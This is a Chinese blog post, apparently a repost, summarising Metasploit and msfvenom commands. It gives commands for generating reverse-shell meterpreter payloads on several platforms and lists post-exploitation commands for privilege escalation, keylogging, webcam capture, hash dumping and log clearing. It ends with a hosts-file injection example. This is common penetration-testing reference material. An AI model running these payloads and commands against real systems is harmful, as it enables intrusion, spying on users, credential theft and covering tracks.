0


网络安全:MSF常用命令总结

[⊙成功在于你坚持了别人坚持不了的东西⊙]

目录

前言

Metasploit

是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

Metasploit常用模块

  • exploit(漏洞利用程序模板):包含各种 PoC 验证程序,用于验证利用特定漏洞(exploit)的可行性。
  • payload(有效载荷模板):包含各种恶意程序,用于在目标系统上运行任意命令。它可能是 exploit 的一部分,也可能是独立编译的应用程序。
  • Auxiliaries(辅助工具模板):包含一系列扫描、嗅探、拨号测试、指纹识别和其他类型的安全评估程序。
  • Encoders(编码工具模板):在渗透测试中,这个模板用来加密有效载荷,以避免被杀毒软件、防火墙、IDS/IPS 以其他类似的反恶意软件检测出来。
  • NOP(空操作模板):这个模板用于在 shellcode 中插入 NOP(汇编指令)。虽然 NOP 不会进行实际的操作,但是在构造 shellcode 时可以用来暂时替代 playload,形成完整的 shellcode 程序。

开启msf命令

msfconsole

查看数据库连接状态(一般会自动连接)

db_status

MSF基础指令

help 或者 ? //帮助菜单
exit //退出MSF控制台
back //返回上一级
info //显示一个或者多个模块的信息
show //显示所给类型的模块
background //将当前操作在后台运行
use //使用所选择的模块
set //设置漏洞参数(rhost、rport等)
unset //取消设置漏洞参数
search 漏洞name //查询漏洞工具
use 漏洞ID //使用漏洞工具
show options //查看漏洞工具配置
sessions -i //查看攻击状态

MSF中的Payload生成

1、Windows/Linux

Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f exe > 保存路径/文件名
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f elf > 保存路径/文件名

2、WEB

PHP:
msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war

3、Android

Android:
msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-o 保存路径/文件名.apk

MSF命令参数

1 Options:2-p,--payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定3-l,--list[module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,all4-n,--nopsled    <length>        为payload预先指定一个NOP滑动长度
 5-f,--format<format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)6-e,--encoder    [encoder]       指定需要使用的encoder(编码器)
 7-a,--arch       <architecture>  指定payload的目标架构
 8--platform   <platform>      指定payload的目标平台
 9-s,--space      <length>        设定有效攻击荷载的最大长度
10-b,--bad-chars  <list>          设定规避字符集,比如:&#039;\x00\xff&#039;11-i,--iterations <count>         指定payload的编码次数
12-c,--add-code   <path>          指定一个附加的win32 shellcode文件
13-x,--template   <path>          指定一个自定义的可执行文件作为模板
14-k,--keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
15--payload-options            列举payload的标准选项
16-o,--out   <path>               保存payload
17-v,--var-name <name>            指定一个自定义的变量,以确定输出格式
18--shellest                   最小化生成payload
19-h,--help                       查看帮助选项
20--help-formats               查看msf支持的输出格式列表

MSF常用系统命令

check:检查指定特定目标是否存在安全漏洞,并且能被exploit(攻击模块)利用
sessions    #sessions –h 查看帮助
sessions -i <ID值>#进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限 
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell

MSF网络命令

ipconfig/ifconfig  #查看IP地址
netstat –ano  #查看端口情况
getproxy   #查看代理信息
route   #查看路由

渗透目标主机后使用的命令

inconfig:列举被渗透主机的网络接口信息
arp    #列举被渗透主机的ARP缓存
shell:获取被渗透主机的cmd shell
getuid:获取当前用户信息
getsystem:提权
getpid:查看Meterepreter会话在被渗透主机内的进程号
ps:列举被渗透主机的所有进程号
sysinfo:列举被渗透主机的信息系统
upload /initrd.img C:\\    :将文件上传到目标系统
rmdir  **.txt    :删除文件
enumdesktops     :桌面命令
screenshot   :截图
webcam_list  :摄像头
获取键盘记录:
 1. keyscan_start
 2. keyscan_dump

run hashdump   :获取密码哈希值
clearev   :清除系统日志

对host文件进行注入:

msf6 exploit(windows/local/ms10_015_kitrap0d)> use post/windows/manage/inject_host
msf6 post(windows/manage/inject_host)> options

Module options (post/windows/manage/inject_host):

   Name     Current Setting  Required  Description

   DOMAIN                    yes       Domain name for host file manipulation.
   IP                        yes       IP address to point domain name to.
   SESSION                   yes       The session to run this module on.

msf6 post(windows/manage/inject_host)>set session 1
session =>1
msf6 post(windows/manage/inject_host)>set ip 192.168.1.113
ip =>192.168.1.113d
msf6 post(windows/manage/inject_host)>set domain www.tianxiu.com
domain => www.tianxiu.com
msf6 post(windows/manage/inject_host)> exploit

[*] Inserting hosts file entry pointing www.tianxiu.com to 192.168.1.113..[+] Done!
[*] Post module execution completed
msf6 post(windows/manage/inject_host)>

实践案例:
网络安全:kali之MSF工具基本使用方法

如有侵权,请联系删除!

标签: web安全 安全

本文转载自: https://blog.csdn.net/weixin_44202489/article/details/127663534
版权归原作者 诺卡先生 所有, 如有侵权,请联系我们删除。

“网络安全:MSF常用命令总结”的评论:

还没有评论